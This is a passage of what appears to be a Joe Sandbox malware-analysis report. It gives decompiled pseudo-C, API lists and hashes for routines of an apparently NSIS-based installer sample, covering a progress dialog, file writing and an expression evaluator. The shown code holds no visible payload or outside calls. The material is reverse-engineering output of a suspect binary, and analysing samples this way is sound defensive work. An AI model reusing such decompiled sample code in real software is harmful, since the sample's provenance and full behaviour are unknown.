                                                            				intOrPtr _v24;
                                                            				long _v56;
                                                            				void* _v60;
                                                            				long _t15;
                                                            				unsigned int _t19;
                                                            				signed int _t25;
                                                            				struct HWND__* _t28;
                                                            
                                                            				_t28 = _a4;
                                                            				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                            				if(_a8 == 0) {
                                                            					L4:
                                                            					_v56 = _t15;
                                                            					_v60 = 4;
                                                            					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                            					return _v24;
                                                            				}
                                                            				_t19 = GetMessagePos();
                                                            				_v16 = _t19 >> 0x10;
                                                            				_v20 = _t19;
                                                            				ScreenToClient(_t28,  &_v20);
                                                            				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                            				if((_v12 & 0x00000066) != 0) {
                                                            					_t15 = _v8;
                                                            					goto L4;
                                                            				}
                                                            				return _t25 | 0xffffffff;
                                                            			}















                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Message$Send$ClientScreen
                                                            • String ID: f
                                                            • API String ID: 41195575-1993550816
                                                            • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                            • Instruction ID: 6a0354fd0873e2a66e4e803e7b6bfaf8a717de4a4c12bc6328b4bc3a065c57a7
                                                            • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                            • Instruction Fuzzy Hash: DB015E71900219BAEB00DBA4DD85BFFBBBCAF55B25F10012BBB40B61D0C7B499018BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00402E25(struct HWND__* _a4, intOrPtr _a8) {
                                                            				char _v68;
                                                            				int _t11;
                                                            				int _t20;
                                                            
                                                            				if(_a8 == 0x110) {
                                                            					SetTimer(_a4, 1, 0xfa, 0);
                                                            					_a8 = 0x113;
                                                            				}
                                                            				if(_a8 == 0x113) {
                                                            					_t20 =  *0x426040; // 0xa399b
                                                            					_t11 =  *0x43204c;
                                                            					if(_t20 >= _t11) {
                                                            						_t20 = _t11;
                                                            					}
                                                            					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                            					SetWindowTextA(_a4,  &_v68);
                                                            					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                            				}
                                                            				return 0;
                                                            			}







                                                            APIs
                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E40
                                                            • MulDiv.KERNEL32 ref: 00402E6B
                                                            • wsprintfA.USER32 ref: 00402E7B
                                                            • SetWindowTextA.USER32(?,?), ref: 00402E8B
                                                            • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E9D
                                                            Strings
                                                            • verifying installer: %d%%, xrefs: 00402E75
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                            • String ID: verifying installer: %d%%
                                                            • API String ID: 1451636040-82062127
                                                            • Opcode ID: 18484903bc97b0010b799efdcc2969c9f7184eca579189d06c0e917a59186ed5
                                                            • Instruction ID: d1e0a2a93c5684a536d9419adbf701d81bd0aa6c2e01a71bf08629b566d4acbd
                                                            • Opcode Fuzzy Hash: 18484903bc97b0010b799efdcc2969c9f7184eca579189d06c0e917a59186ed5
                                                            • Instruction Fuzzy Hash: 4A016270640209FBEF209F60DE09EAE3769EB04344F008039FA06B51D0DBB89955CF59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E73C21F58(void* _a4) {
                                                            				signed int _v4;
                                                            				signed int _v8;
                                                            				signed int _t46;
                                                            				void* _t47;
                                                            				signed int _t48;
                                                            				void* _t49;
                                                            				void* _t52;
                                                            				void* _t56;
                                                            				signed int _t57;
                                                            				signed int _t59;
                                                            				void* _t60;
                                                            
                                                            				_t52 = _a4;
                                                            				_t46 = 0 |  *((intOrPtr*)(_t52 + 0x814)) > 0x00000000;
                                                            				while(1) {
                                                            					_v8 = _t46;
                                                            					_t59 = _t46 << 5;
                                                            					_t60 =  *(_t59 + _t52 + 0x830);
                                                            					if(_t60 == 0 || _t60 == 0x1a) {
                                                            						goto L8;
                                                            					}
                                                            					if(_t60 != 0xffffffff) {
                                                            						_t51 = _t60 - 1;
                                                            						if(_t60 - 1 > 0x18) {
                                                            							 *(_t59 + _t52 + 0x830) = 0x1a;
                                                            							L11:
                                                            							_t56 = _t59 + _t52;
                                                            							if( *((intOrPtr*)(_t59 + _t52 + 0x81c)) >= 0) {
                                                            							}
                                                            							_t48 =  *(_t59 + _t52 + 0x818) & 0x000000ff;
                                                            							 *(_t59 + _t52 + 0x834) =  *(_t59 + _t52 + 0x834) & 0x00000000;
                                                            							_v4 = _t48;
                                                            							if(_t48 > 7) {
                                                            								L28:
                                                            								_t49 = GlobalFree(_t60);
                                                            								_t57 = _v8;
                                                            								if(_t57 == 0) {
                                                            									return _t49;
                                                            								}
                                                            								_t43 = _t57 + 1; // 0x2
                                                            								_t55 =  !=  ? _t43 : 0;
                                                            								_t46 =  !=  ? _t43 : 0;
                                                            								continue;
                                                            							} else {
                                                            								switch( *((intOrPtr*)(_t48 * 4 +  &M73C22108))) {
                                                            									case 0:
                                                            										 *(_t56 + 0x820) =  *(_t56 + 0x820) & 0x00000000;
                                                            										goto L28;
                                                            									case 1:
                                                            										_push(__esi);
                                                            										__eax = E73C21326();
                                                            										_pop(__ecx);
                                                            										goto L18;
                                                            									case 2:
                                                            										_push(__esi);
                                                            										__eax = E73C21326();
                                                            										_pop(__ecx);
                                                            										 *__ebp = __eax;
                                                            										_a4 = __edx;
                                                            										goto L28;
                                                            									case 3:
                                                            										__eax = E73C212AF(__esi);
                                                            										goto L21;
                                                            									case 4:
                                                            										 *0x73c25040 =  *0x73c25040 +  *0x73c25040;
                                                            										__eax = GlobalAlloc(0x40,  *0x73c25040 +  *0x73c25040);
                                                            										__ecx =  *0x73c25040;
                                                            										_a4 = __eax;
                                                            										__eax = MultiByteToWideChar(0, 0, __esi,  *0x73c25040, __eax,  *0x73c25040);
                                                            										if(_v4 != 5) {
                                                            											__eax = _a4;
                                                            											L21:
                                                            											 *(__edi + __ebx + 0x834) = __eax;
                                                            											L18:
                                                            											 *__ebp = __eax;
                                                            											goto L28;
                                                            										}
                                                            										__eax = GlobalAlloc(0x40, 0x10);
                                                            										 *(__edi + __ebx + 0x834) = __eax;
                                                            										__edi = _a4;
                                                            										_push(__eax);
                                                            										_push(__edi);
                                                            										 *__ebp = __eax;
                                                            										__imp__CLSIDFromString();
                                                            										__eax = GlobalFree(__edi);
                                                            										goto L28;
                                                            									case 5:
                                                            										if( *__esi != 0) {
                                                            											_push(__esi);
                                                            											__eax = E73C21326();
                                                            											 *(__edi + __ebx + 0x820) = __eax;
                                                            										}
                                                            										goto L28;
                                                            									case 6:
                                                            										 *(__edi + __ebx + 0x830) =  *(__edi + __ebx + 0x830) - 1;
                                                            										__ecx = ( *(__edi + __ebx + 0x830) - 1) *  *0x73c25040;
                                                            										__ecx = ( *(__edi + __ebx + 0x830) - 1) *  *0x73c25040 +  *0x73c25038;
                                                            										_push(__ecx);
                                                            										__eax = __ecx + 0xc;
                                                            										 *(__edx + 0x820) = __eax;
                                                            										asm("cdq");
                                                            										_push(__edx);
                                                            										_push(__eax);
                                                            										__eax = E73C2144D(__ecx);
                                                            										__esp = __esp + 0xc;
                                                            										goto L28;
                                                            								}
                                                            							}
                                                            						}
                                                            						_t47 = E73C214E2(_t51);
                                                            						L9:
                                                            						L10:
                                                            						_t60 = _t47;
                                                            						goto L11;
                                                            					}
                                                            					_t47 = E73C2152B();
                                                            					goto L10;
                                                            					L8:
                                                            					_t47 = E73C212AF(0x73c240c7);
                                                            					goto L9;
                                                            				}
                                                            			}















                                                            APIs
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C220DD
                                                              • Part of subcall function 73C212AF: lstrcpynA.KERNEL32(00000000,?,73C21502,?,73C211C4,-000000A0), ref: 73C212BF
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 73C22042
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 73C2205A
                                                            • GlobalAlloc.KERNEL32(00000040,00000010), ref: 73C2206B
                                                            • CLSIDFromString.OLE32(00000000,00000000), ref: 73C22081
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C22088
                                                              • Part of subcall function 73C21958: VirtualAlloc.KERNEL32(00000000,00000010,00001000,00000040,?,73C220A7,00000000,?), ref: 73C2198A
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1326511845.0000000073C21000.00000020.00000001.01000000.00000007.sdmp, Offset: 73C20000, based on PE: true
                                                            • Associated: 00000009.00000002.1326498896.0000000073C20000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000009.00000002.1326522491.0000000073C24000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000009.00000002.1326541140.0000000073C26000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_73c20000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$Alloc$Free$ByteCharFromMultiStringVirtualWidelstrcpyn
                                                            • String ID:
                                                            • API String ID: 506890080-0
                                                            • Opcode ID: 1dd5703124937e311f3302622533df8b4b65cf41a430222b5aba0b336caf9b7c
                                                            • Instruction ID: 2f986475d0e71452ac79743aa4a814925d7ffcd8e8b4b9f8824ca2ea71ecf17a
                                                            • Opcode Fuzzy Hash: 1dd5703124937e311f3302622533df8b4b65cf41a430222b5aba0b336caf9b7c
                                                            • Instruction Fuzzy Hash: A941C172505205EFD305EF25DC44BAABBE8FF44312F55823AE859CE18ADB306940CBE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 86%
                                                            			E004027E8(int __ebx) {
                                                            				CHAR* _t26;
                                                            				void* _t29;
                                                            				long _t37;
                                                            				int _t49;
                                                            				void* _t52;
                                                            				void* _t54;
                                                            				void* _t56;
                                                            				void* _t59;
                                                            				void* _t60;
                                                            				void* _t61;
                                                            
                                                            				_t49 = __ebx;
                                                            				_t52 = 0xfffffd66;
                                                            				_t26 = E00402C39(0xfffffff0);
                                                            				_t55 = _t26;
                                                            				 *(_t61 - 0x78) = _t26;
                                                            				if(E00405C56(_t26) == 0) {
                                                            					E00402C39(0xffffffed);
                                                            				}
                                                            				E00405DC5(_t55);
                                                            				_t29 = E00405DEA(_t55, 0x40000000, 2);
                                                            				 *(_t61 + 8) = _t29;
                                                            				if(_t29 != 0xffffffff) {
                                                            					 *(_t61 - 0xc) =  *(_t61 - 0x24);
                                                            					if( *(_t61 - 0x20) != _t49) {
                                                            						_t37 =  *0x452434;
                                                            						 *(_t61 - 0x30) = _t37;
                                                            						_t54 = GlobalAlloc(0x40, _t37);
                                                            						if(_t54 != _t49) {
                                                            							E0040336B(_t49);
                                                            							E00403355(_t54,  *(_t61 - 0x30));
                                                            							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x20));
                                                            							 *(_t61 - 0x38) = _t59;
                                                            							if(_t59 != _t49) {
                                                            								E00403143( *(_t61 - 0x24), _t49, _t59,  *(_t61 - 0x20));
                                                            								while( *_t59 != _t49) {
                                                            									_t60 = _t59 + 8;
                                                            									 *(_t61 - 0x8c) =  *_t59;
                                                            									E00405DA5( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                            									_t59 = _t60 +  *(_t61 - 0x8c);
                                                            								}
                                                            								GlobalFree( *(_t61 - 0x38));
                                                            							}
                                                            							E00405E91( *(_t61 + 8), _t54,  *(_t61 - 0x30));
                                                            							GlobalFree(_t54);
                                                            							 *(_t61 - 0xc) =  *(_t61 - 0xc) | 0xffffffff;
                                                            						}
                                                            					}
                                                            					_t52 = E00403143( *(_t61 - 0xc),  *(_t61 + 8), _t49, _t49);
                                                            					CloseHandle( *(_t61 + 8));
                                                            				}
                                                            				_t56 = 0xfffffff3;
                                                            				if(_t52 < _t49) {
                                                            					_t56 = 0xffffffef;
                                                            					DeleteFileA( *(_t61 - 0x78));
                                                            					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                            				}
                                                            				_push(_t56);
                                                            				E00401423();
                                                            				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t61 - 4));
                                                            				return 0;
                                                            			}














                                                            APIs
                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402849
                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402865
                                                            • GlobalFree.KERNEL32(?), ref: 004028A4
                                                            • GlobalFree.KERNEL32(00000000), ref: 004028B7
                                                            • CloseHandle.KERNEL32(?), ref: 004028D3
                                                            • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004028E6
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                            • String ID:
                                                            • API String ID: 2667972263-0
                                                            • Opcode ID: a3127964956f8a126563134f11b56d6a7ee8279a476d2f452480084297a57a74
                                                            • Instruction ID: 62dc5015629f04e2a446b0396b5ca5864e91704113ef4cf620f7a35519d741bb
                                                            • Opcode Fuzzy Hash: a3127964956f8a126563134f11b56d6a7ee8279a476d2f452480084297a57a74
                                                            • Instruction Fuzzy Hash: 4B31AD32800128BBDF207FA5DE88D9E7B79BF08324F14423AF454B62D1CB7989419B68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 88%
                                                            			E73C21C2B(signed int __edx, char _a8, void* _a16) {
                                                            				char _v8;
                                                            				char _v28;
                                                            				void* _v32;
                                                            				signed int _v36;
                                                            				signed int _v40;
                                                            				void* _t28;
                                                            				char _t31;
                                                            				char _t32;
                                                            				signed int _t33;
                                                            				signed int _t41;
                                                            				signed int _t42;
                                                            				signed int _t43;
                                                            				signed int _t44;
                                                            				signed int _t45;
                                                            				signed int _t46;
                                                            				signed int _t51;
                                                            				void* _t52;
                                                            				void* _t53;
                                                            				void* _t54;
                                                            				void* _t55;
                                                            				void* _t56;
                                                            				signed int _t63;
                                                            				char _t67;
                                                            				signed int _t70;
                                                            				signed int _t72;
                                                            				void* _t79;
                                                            				void* _t81;
                                                            				signed int _t83;
                                                            				signed int _t86;
                                                            				void* _t91;
                                                            
                                                            				_t70 = __edx;
                                                            				asm("xorps xmm0, xmm0");
                                                            				 *0x73c25040 = _a8;
                                                            				 *0x73c2503c = _a16;
                                                            				asm("movlpd [esp+0x10], xmm0");
                                                            				_t28 = E73C2152B();
                                                            				_push(_t28);
                                                            				_v32 = _t28;
                                                            				_t72 = E73C21326();
                                                            				_t63 = _t70;
                                                            				_t79 = E73C2152B();
                                                            				_a16 = _t79;
                                                            				_t67 =  *_t79;
                                                            				_t31 = _t67;
                                                            				_a8 = _t31;
                                                            				if(_t67 == 0x7e) {
                                                            					L3:
                                                            					_t68 = _v36;
                                                            					_t83 = _v40;
                                                            					L4:
                                                            					_t32 = _t31;
                                                            					_t91 = _t32 - 0x2f;
                                                            					if(_t91 > 0) {
                                                            						_t33 = _t32 - 0x3c;
                                                            						__eflags = _t33;
                                                            						if(_t33 == 0) {
                                                            							__eflags =  *((char*)(_t79 + 1)) - 0x3c;
                                                            							if( *((char*)(_t79 + 1)) != 0x3c) {
                                                            								__eflags = _t63 - _t68;
                                                            								if(__eflags > 0) {
                                                            									L18:
                                                            									asm("xorps xmm0, xmm0");
                                                            									asm("movlpd [esp+0x10], xmm0");
                                                            									_t72 = _v40;
                                                            									_t63 = _v36;
                                                            									L19:
                                                            									_push( &_v28);
                                                            									_push(_t63);
                                                            									_push(_t72);
                                                            									E73C2144D(_t68);
                                                            									E73C2157E( &_v28);
                                                            									GlobalFree(_v32);
                                                            									return GlobalFree(_t79);
                                                            								}
                                                            								if(__eflags < 0) {
                                                            									L57:
                                                            									_t72 = 1;
                                                            									_t63 = 0;
                                                            									goto L19;
                                                            								}
                                                            								__eflags = _t72 - _t83;
                                                            								if(_t72 >= _t83) {
                                                            									goto L18;
                                                            								}
                                                            								goto L57;
                                                            							}
                                                            							_t70 = _t63;
                                                            							_t68 = _t83;
                                                            							_t41 = E73C23090(_t72, _t83, _t70);
                                                            							L53:
                                                            							_t72 = _t41;
                                                            							_t63 = _t70;
                                                            							goto L19;
                                                            						}
                                                            						_t42 = _t33 - 1;
                                                            						__eflags = _t42;
                                                            						if(_t42 == 0) {
                                                            							__eflags = _t72 - _t83;
                                                            							if(_t72 != _t83) {
                                                            								goto L18;
                                                            							}
                                                            							__eflags = _t63 - _t68;
                                                            							L22:
                                                            							if(__eflags != 0) {
                                                            								goto L18;
                                                            							}
                                                            							goto L57;
                                                            						}
                                                            						_t43 = _t42 - 1;
                                                            						__eflags = _t43;
                                                            						if(_t43 == 0) {
                                                            							__eflags =  *((char*)(_t79 + 1)) - 0x3e;
                                                            							if( *((char*)(_t79 + 1)) != 0x3e) {
                                                            								__eflags = _t63 - _t68;
                                                            								if(__eflags < 0) {
                                                            									goto L18;
                                                            								}
                                                            								if(__eflags > 0) {
                                                            									goto L57;
                                                            								}
                                                            								__eflags = _t72 - _t83;
                                                            								if(_t72 <= _t83) {
                                                            									goto L18;
                                                            								}
                                                            								goto L57;
                                                            							}
                                                            							__eflags =  *((char*)(_t79 + 2)) - 0x3e;
                                                            							_t44 = _t72;
                                                            							_t70 = _t63;
                                                            							_t68 = _t83;
                                                            							if( *((char*)(_t79 + 2)) != 0x3e) {
                                                            								_t41 = E73C230B0(_t44, _t68, _t70);
                                                            							} else {
                                                            								_t41 = E73C230E0(_t44, _t68, _t70);
                                                            							}
                                                            							goto L53;
                                                            						}
                                                            						_t45 = _t43 - 0x20;
                                                            						__eflags = _t45;
                                                            						if(_t45 == 0) {
                                                            							_t72 = _t72 ^ _t83;
                                                            							_t63 = _t63 ^ _t68;
                                                            							goto L19;
                                                            						}
                                                            						_t46 = _t45 - 0x1e;
                                                            						__eflags = _t46;
                                                            						if(_t46 == 0) {
                                                            							__eflags =  *((char*)(_t79 + 1)) - 0x7c;
                                                            							if( *((char*)(_t79 + 1)) != 0x7c) {
                                                            								_t72 = _t72 | _t83;
                                                            								_t63 = _t63 | _t68;
                                                            								goto L19;
                                                            							}
                                                            							__eflags = _t72 | _t63;
                                                            							if((_t72 | _t63) != 0) {
                                                            								goto L57;
                                                            							}
                                                            							L17:
                                                            							__eflags = _t83 | _t68;
                                                            							if((_t83 | _t68) != 0) {
                                                            								goto L57;
                                                            							}
                                                            							goto L18;
                                                            						}
                                                            						__eflags = _t46 == 0;
                                                            						if(_t46 == 0) {
                                                            							_t72 =  !_t72;
                                                            							_t63 =  !_t63;
                                                            						}
                                                            						goto L19;
                                                            					}
                                                            					if(_t91 == 0) {
                                                            						L24:
                                                            						__eflags = _t83 | _t68;
                                                            						if((_t83 | _t68) != 0) {
                                                            							_push(_t68);
                                                            							_push(_t83);
                                                            							_push(_t63);
                                                            							_push(_t72);
                                                            							_t51 = E73C22FB0();
                                                            							_t86 = _t63;
                                                            							_t72 = _t51;
                                                            							_t63 = _t70;
                                                            						} else {
                                                            							asm("xorps xmm0, xmm0");
                                                            							_t68 = _t72;
                                                            							asm("movlpd [esp+0x10], xmm0");
                                                            							_t86 = _t63;
                                                            							_t63 = _v36;
                                                            							_t72 = _v40;
                                                            						}
                                                            						__eflags = _v8 - 0x2f;
                                                            						if(_v8 != 0x2f) {
                                                            							_t72 = _t68;
                                                            							_t63 = _t86;
                                                            						}
                                                            						goto L19;
                                                            					}
                                                            					_t52 = _t32 - 0x21;
                                                            					if(_t52 == 0) {
                                                            						__eflags = _t72 | _t63;
                                                            						goto L22;
                                                            					}
                                                            					_t53 = _t52 - 4;
                                                            					if(_t53 == 0) {
                                                            						goto L24;
                                                            					}
                                                            					_t54 = _t53 - 1;
                                                            					if(_t54 == 0) {
                                                            						__eflags =  *((char*)(_t79 + 1)) - 0x26;
                                                            						if( *((char*)(_t79 + 1)) != 0x26) {
                                                            							_t72 = _t72 & _t83;
                                                            							_t63 = _t63 & _t68;
                                                            							goto L19;
                                                            						}
                                                            						__eflags = _t72 | _t63;
                                                            						if((_t72 | _t63) == 0) {
                                                            							goto L18;
                                                            						}
                                                            						goto L17;
                                                            					}
                                                            					_t55 = _t54 - 4;
                                                            					if(_t55 == 0) {
                                                            						_t41 = E73C22ED0(_t72, _t63, _t83, _t68);
                                                            						goto L53;
                                                            					} else {
                                                            						_t56 = _t55 - 1;
                                                            						if(_t56 == 0) {
                                                            							_t72 = _t72 + _t83;
                                                            							asm("adc ebx, ecx");
                                                            						} else {
                                                            							if(_t56 == 0) {
                                                            								_t72 = _t72 - _t83;
                                                            								asm("sbb ebx, ecx");
                                                            							}
                                                            						}
                                                            						goto L19;
                                                            					}
                                                            				}
                                                            				_a8 = _t67;
                                                            				if(_t67 == 0x21) {
                                                            					goto L3;
                                                            				} else {
                                                            					_t81 = E73C2152B();
                                                            					_push(_t81);
                                                            					_t83 = E73C21326();
                                                            					_v40 = _t70;
                                                            					GlobalFree(_t81);
                                                            					_t79 = _a16;
                                                            					_t68 = _v40;
                                                            					_t31 =  *_t79;
                                                            					_a8 = _t31;
                                                            					goto L4;
                                                            				}
                                                            			}

































                                                            0x73c21e22
                                                            0x73c21e24
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c21e2a
                                                            0x73c21dfe
                                                            0x73c21e02
                                                            0x73c21e04
                                                            0x73c21e06
                                                            0x73c21e08
                                                            0x73c21e11
                                                            0x73c21e0a
                                                            0x73c21e0a
                                                            0x73c21e0a
                                                            0x00000000
                                                            0x73c21e08
                                                            0x73c21db6
                                                            0x73c21db6
                                                            0x73c21db9
                                                            0x73c21def
                                                            0x73c21df1
                                                            0x00000000
                                                            0x73c21df1
                                                            0x73c21dbb
                                                            0x73c21dbb
                                                            0x73c21dbe
                                                            0x73c21dd3
                                                            0x73c21dd7
                                                            0x73c21de6
                                                            0x73c21de8
                                                            0x00000000
                                                            0x73c21de8
                                                            0x73c21dd9
                                                            0x73c21ddb
                                                            0x00000000
                                                            0x00000000
                                                            0x73c21d12
                                                            0x73c21d12
                                                            0x73c21d14
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c21d14
                                                            0x73c21dc1
                                                            0x73c21dc4
                                                            0x73c21dca
                                                            0x73c21dcc
                                                            0x73c21dcc
                                                            0x00000000
                                                            0x73c21dc4
                                                            0x73c21cc1
                                                            0x73c21d6a
                                                            0x73c21d6c
                                                            0x73c21d6e
                                                            0x73c21d87
                                                            0x73c21d88
                                                            0x73c21d89
                                                            0x73c21d8a
                                                            0x73c21d8b
                                                            0x73c21d90
                                                            0x73c21d92
                                                            0x73c21d94
                                                            0x73c21d70
                                                            0x73c21d70
                                                            0x73c21d73
                                                            0x73c21d75
                                                            0x73c21d7b
                                                            0x73c21d7d
                                                            0x73c21d81
                                                            0x73c21d81
                                                            0x73c21d96
                                                            0x73c21d9b
                                                            0x73c21d9d
                                                            0x73c21d9f
                                                            0x73c21d9f
                                                            0x00000000
                                                            0x73c21d9b
                                                            0x73c21cc7
                                                            0x73c21cca
                                                            0x73c21d61
                                                            0x00000000
                                                            0x73c21d61
                                                            0x73c21cd0
                                                            0x73c21cd3
                                                            0x00000000
                                                            0x00000000
                                                            0x73c21cd9
                                                            0x73c21cdc
                                                            0x73c21d08
                                                            0x73c21d0c
                                                            0x73c21d5b
                                                            0x73c21d5d
                                                            0x00000000
                                                            0x73c21d5d
                                                            0x73c21d0e
                                                            0x73c21d10
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c21d10
                                                            0x73c21cde
                                                            0x73c21ce1
                                                            0x73c21cfe
                                                            0x00000000
                                                            0x73c21ce3
                                                            0x73c21ce3
                                                            0x73c21ce6
                                                            0x73c21cf4
                                                            0x73c21cf6
                                                            0x73c21ce8
                                                            0x73c21cec
                                                            0x73c21cee
                                                            0x73c21cf0
                                                            0x73c21cf0
                                                            0x73c21cec
                                                            0x00000000
                                                            0x73c21ce6
                                                            0x73c21ce1
                                                            0x73c21c79
                                                            0x73c21c80
                                                            0x00000000
                                                            0x73c21c82
                                                            0x73c21c87
                                                            0x73c21c89
                                                            0x73c21c91
                                                            0x73c21c93
                                                            0x73c21c97
                                                            0x73c21c9d
                                                            0x73c21ca1
                                                            0x73c21ca5
                                                            0x73c21ca7
                                                            0x00000000
                                                            0x73c21ca7

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1326511845.0000000073C21000.00000020.00000001.01000000.00000007.sdmp, Offset: 73C20000, based on PE: true
                                                            • Associated: 00000009.00000002.1326498896.0000000073C20000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000009.00000002.1326522491.0000000073C24000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000009.00000002.1326541140.0000000073C26000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_73c20000_file.jbxd
                                                            Similarity
                                                            • API ID: FreeGlobal$__alldvrm
                                                            • String ID: /
                                                            • API String ID: 482422042-2043925204
                                                            • Opcode ID: be58f7f9cabf05b53cb63f4d7f475f4ef37ea3662cc6463031ab90c15dcd0110
                                                            • Instruction ID: 50830b5e42e9dac52ca9602fb1ef901a4b62b42c54e2956ec6d81e487bfaadf6
                                                            • Opcode Fuzzy Hash: be58f7f9cabf05b53cb63f4d7f475f4ef37ea3662cc6463031ab90c15dcd0110
                                                            • Instruction Fuzzy Hash: 6B510B76A08385DBD323AE7A8CC472A7EFEABCA113F1A052DE146C7245D7A1DC454362
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E73C210C6(void* _a8, intOrPtr _a12, void* _a16, intOrPtr _a20) {
                                                            				signed int _v0;
                                                            				void _t29;
                                                            				void* _t30;
                                                            				void* _t36;
                                                            				void* _t43;
                                                            				intOrPtr _t52;
                                                            				void* _t56;
                                                            				void* _t62;
                                                            				void* _t63;
                                                            				void _t66;
                                                            				void* _t67;
                                                            				void* _t74;
                                                            				signed int _t75;
                                                            				void* _t79;
                                                            				void* _t80;
                                                            				void* _t82;
                                                            				signed int _t83;
                                                            				void* _t85;
                                                            				void _t88;
                                                            				void _t89;
                                                            				void* _t90;
                                                            				void* _t92;
                                                            				void* _t94;
                                                            
                                                            				 *0x73c25040 = _a8;
                                                            				 *0x73c2503c = _a16;
                                                            				 *0x73c25038 = _a12;
                                                            				 *((intOrPtr*)(_a20 + 0xc))( *0x73c25014, E73C212F7, _t79, _t82);
                                                            				_t83 =  *0x73c25040 * 0x14;
                                                            				_v0 = _t83;
                                                            				_t90 = E73C2152B();
                                                            				_a8 = _t90;
                                                            				_t80 = _t90;
                                                            				_t66 = _v0;
                                                            				if(_t66 == 0) {
                                                            					L28:
                                                            					return GlobalFree(_t90);
                                                            				}
                                                            				do {
                                                            					_t29 = _t66;
                                                            					_t80 = _t80 + 1;
                                                            					_t94 = _t29 - 0x66;
                                                            					if(_t94 > 0) {
                                                            						_t30 = _t29 - 0x6c;
                                                            						if(_t30 == 0) {
                                                            							L24:
                                                            							_t31 =  *0x73c25010;
                                                            							if( *0x73c25010 != 0) {
                                                            								E73C212FA( *0x73c25038, _t31 + 4, _t83);
                                                            								_t67 =  *0x73c25010;
                                                            								_t92 = _t92 + 0xc;
                                                            								 *0x73c25010 =  *_t67;
